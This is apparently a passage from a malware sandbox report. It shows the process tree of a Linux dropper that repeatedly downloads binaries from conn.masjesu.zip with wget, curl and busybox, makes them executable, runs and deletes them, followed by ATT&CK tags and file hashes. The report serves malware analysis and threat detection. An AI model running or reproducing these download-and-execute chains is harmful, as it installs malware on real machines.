                                                                              PID:990
                                                                            • /usr/bin/wget
                                                                              wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                                                                              2⤵
                                                                                PID:991
                                                                              • /usr/bin/curl
                                                                                curl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                                                                                2⤵
                                                                                • Reads runtime system information
                                                                                • System Network Configuration Discovery
                                                                                • Writes file to tmp directory
                                                                                PID:992
                                                                              • /bin/busybox
                                                                                /bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                                                                                2⤵
                                                                                  PID:994
                                                                                • /bin/chmod
                                                                                  chmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                                                                                  2⤵
                                                                                  • File and Directory Permissions Modification
                                                                                  PID:995
                                                                                • /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                                                                                  ./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:996
                                                                                • /bin/rm
                                                                                  rm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
                                                                                  2⤵
                                                                                    PID:998
                                                                                  • /usr/bin/wget
                                                                                    wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                                                                    2⤵
                                                                                    • System Network Configuration Discovery
                                                                                    PID:999
                                                                                  • /usr/bin/curl
                                                                                    curl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                                                                    2⤵
                                                                                    • Reads runtime system information
                                                                                    • System Network Configuration Discovery
                                                                                    • Writes file to tmp directory
                                                                                    PID:1000
                                                                                  • /bin/busybox
                                                                                    /bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                                                                    2⤵
                                                                                    • System Network Configuration Discovery
                                                                                    PID:1002
                                                                                  • /bin/chmod
                                                                                    chmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                                                                    2⤵
                                                                                    • File and Directory Permissions Modification
                                                                                    PID:1003
                                                                                  • /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                                                                    ./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1004
                                                                                  • /bin/rm
                                                                                    rm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
                                                                                    2⤵
                                                                                      PID:1006
                                                                                    • /usr/bin/wget
                                                                                      wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                                                                      2⤵
                                                                                      • System Network Configuration Discovery
                                                                                      PID:1007
                                                                                    • /usr/bin/curl
                                                                                      curl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                                                                      2⤵
                                                                                      • Reads runtime system information
                                                                                      • System Network Configuration Discovery
                                                                                      • Writes file to tmp directory
                                                                                      PID:1008
                                                                                    • /bin/busybox
                                                                                      /bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                                                                      2⤵
                                                                                      • System Network Configuration Discovery
                                                                                      PID:1010
                                                                                    • /bin/chmod
                                                                                      chmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                                                                      2⤵
                                                                                      • File and Directory Permissions Modification
                                                                                      PID:1011
                                                                                    • /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                                                                      ./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1012
                                                                                    • /bin/rm
                                                                                      rm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
                                                                                      2⤵
                                                                                        PID:1013
                                                                                      • /usr/bin/wget
                                                                                        wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                                                                        2⤵
                                                                                        • System Network Configuration Discovery
                                                                                        PID:1014
                                                                                      • /usr/bin/curl
                                                                                        curl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                                                                        2⤵
                                                                                        • Reads runtime system information
                                                                                        • System Network Configuration Discovery
                                                                                        • Writes file to tmp directory
                                                                                        PID:1015
                                                                                      • /bin/busybox
                                                                                        /bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                                                                        2⤵
                                                                                        • System Network Configuration Discovery
                                                                                        PID:1017
                                                                                      • /bin/chmod
                                                                                        chmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                                                                        2⤵
                                                                                        • File and Directory Permissions Modification
                                                                                        PID:1018
                                                                                      • /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                                                                        ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1019
                                                                                      • /bin/rm
                                                                                        rm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
                                                                                        2⤵
                                                                                          PID:1020

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA

                                                                                        Filesize

                                                                                        153B

                                                                                        MD5

                                                                                        998368d7c95ea4293237f2320546e440

                                                                                        SHA1

                                                                                        30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

                                                                                        SHA256

                                                                                        533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

                                                                                        SHA512

                                                                                        648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

                                                                                      • /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw

                                                                                        Filesize

                                                                                        16B

                                                                                        MD5

                                                                                        7689ca8c5bc85cf6b78ef89323d4df6a

                                                                                        SHA1

                                                                                        a1392ec3b571b3de167f0b9a5dadab4f14a2db76

                                                                                        SHA256

                                                                                        17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5

                                                                                        SHA512

                                                                                        40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471